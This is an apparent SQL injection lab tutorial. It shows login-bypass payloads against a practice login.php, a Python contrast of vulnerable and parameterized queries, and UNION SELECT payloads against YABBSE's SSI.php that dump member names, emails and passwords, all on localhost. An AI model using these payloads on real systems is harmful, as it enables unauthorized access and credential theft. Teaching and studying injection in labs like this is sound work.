[01] Open the terminal and type (without prepending prompt symbols):
$ su -
# sql_tutorial_start
These commands will start all needed services in the background.
[02] Open the browser and check http://localhost/phpmyadmin/.
[03] Have a look at the database userdb that our login.php script is accessing.
[04] Have a look at the login.php script. To do this, open another terminal and type:
$ vi login.php
or, in case you are not familiar with the vi text editor, you can use the more user-friendly mcedit (or any other editor you wish):
$ mcedit login.php
[05] If you want to see the submitted query to get more information, delete the slashes that comment out the echo "$query" line:

[06] Now open the browser again and go to http://localhost/login.php. You will see a page similar to the one below:

(screenshot: SQL_tutorial_02)
[07] Enter the username admin, which we know exists. As you can see, we cannot log in because the password is missing.
[08] Now append a ' to the username to see if the script is vulnerable. The script generates an error, so we can move on.

[09] Enter admin' OR 1=1 as username and see what happens.
[10] From the query we can see that we have a closing single quote that isn't opened.
[11] Enter admin 'OR 1='1 as username. Now the query is valid and we're in:

[12] To advance the attack you might want to check out /*, which comments out everything that follows. Enter admin' /* as username and check the query:
SELECT * FROM `userlist` WHERE `username` = 'admin' /*' AND `password` = ''
is what we entered, but only the part before /* is processed by the database. This is why the statement is valid.
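The login.php logic above, reproduced here as an added example (not the tutorial's own code) in Python with an in-memory sqlite3 stand-in for the userdb database: the vulnerable string-concatenated query next to the parameterized form that fixes it. The table contents and the password s3cret are constructed sample data.

```python
import sqlite3

# Constructed in-memory stand-in for the tutorial's userdb/userlist table
# (table and column names follow the query shown in the tutorial).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE userlist (username TEXT, password TEXT)")
    db.execute("INSERT INTO userlist VALUES ('admin', 's3cret')")  # constructed sample row
    db.commit()
    return db

def login_vulnerable(db, username, password):
    """Mirrors login.php: user input is pasted straight into the SQL string,
    so a quote or /* in the username becomes part of the statement."""
    query = ("SELECT * FROM `userlist` WHERE `username` = '" + username +
             "' AND `password` = '" + password + "'")
    rows = db.execute(query).fetchall()
    return len(rows) > 0, query

def login_fixed(db, username, password):
    """Hardened form: placeholders send the values separately from the SQL text,
    so the same input is treated as plain data and the password check stays intact."""
    query = "SELECT * FROM `userlist` WHERE `username` = ? AND `password` = ?"
    rows = db.execute(query, (username, password)).fetchall()
    return len(rows) > 0, query

def demo():
    """Run the three inputs from the tutorial against both versions; returns
    {version: {case: logged_in}} so the outcomes can be compared side by side."""
    db = make_db()
    results = {}
    for name, fn in (("vulnerable", login_vulnerable), ("fixed", login_fixed)):
        results[name] = {
            "admin, no password": fn(db, "admin", "")[0],
            "admin, correct password": fn(db, "admin", "s3cret")[0],
            "admin' /* (step 12)": fn(db, "admin' /*", "")[0],
        }
    return results

if __name__ == "__main__":
    for version, outcome in demo().items():
        for case, logged_in in outcome.items():
            print(f"{version:10} {case:24} -> {'logged in' if logged_in else 'rejected'}")
```

Only the concatenated version accepts the step 12 input without a password; the parameterized version rejects it and still accepts the genuine credentials.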


II. UNION SELECT
[01] We installed YABBSE under http://localhost/yabbse/. The vulnerable script is located at http://localhost/yabbse/SSI.php.
[02] Open the script in the console by typing:
$ vi /yabbse/SSI.php
or use whichever editor you want. Now move to line 222, where the query we are trying to manipulate is located.
[03] To get into the function recentTopics, call http://localhost/yabbse/SSI.php?func...
[04] In this query a variable $ID_MEMBER is processed. This is where we try to break in. We should now move to http://localhost/yabbse/SSI.php?func..._MEMBER=1' (notice the single quote at the end). This results in an error, so the script is potentially vulnerable to SQL injection.
[05] From the error message we can see that a table lmr is referenced in the original query but is now missing. We search for the original query in the editor and append the missing part to our query.

[06] Go to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1) UNION SELECT ID_MEMBER, memberName FROM yabbse_members /*. From the error message we can see that the inserted SELECT statement doesn't return the same number of columns as the original query. We have to add columns to make the count equal.

[07] Move your browser to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1 OR 1=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT memberName, emailAddress, passwd, null, null, null, null, null, null, null, null, null FROM yabbse_members /*. Now we seem to have a valid query, but can only see the e-mail address:

[08] Have a look at line 223 and below. There you find the HTML output code that displays the result of our query, so what we have to do now is rearrange our null placeholders so the wanted columns land in the fields that get displayed.
[09] Move to http://localhost/yabbse/SSI.php?func...s&ID_MEMBER=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT null, memberName, null, emailAddress, null, passwd,null,null,null,null,null,null FROM yabbse_members /*. There we are - we have managed to obtain all information we wanted:

[10] Return to a terminal opened at the beginning (or open a new one) and issue commands:
$ su -
# sql_tutorial_stop
This will stop all services needed for this tutorial.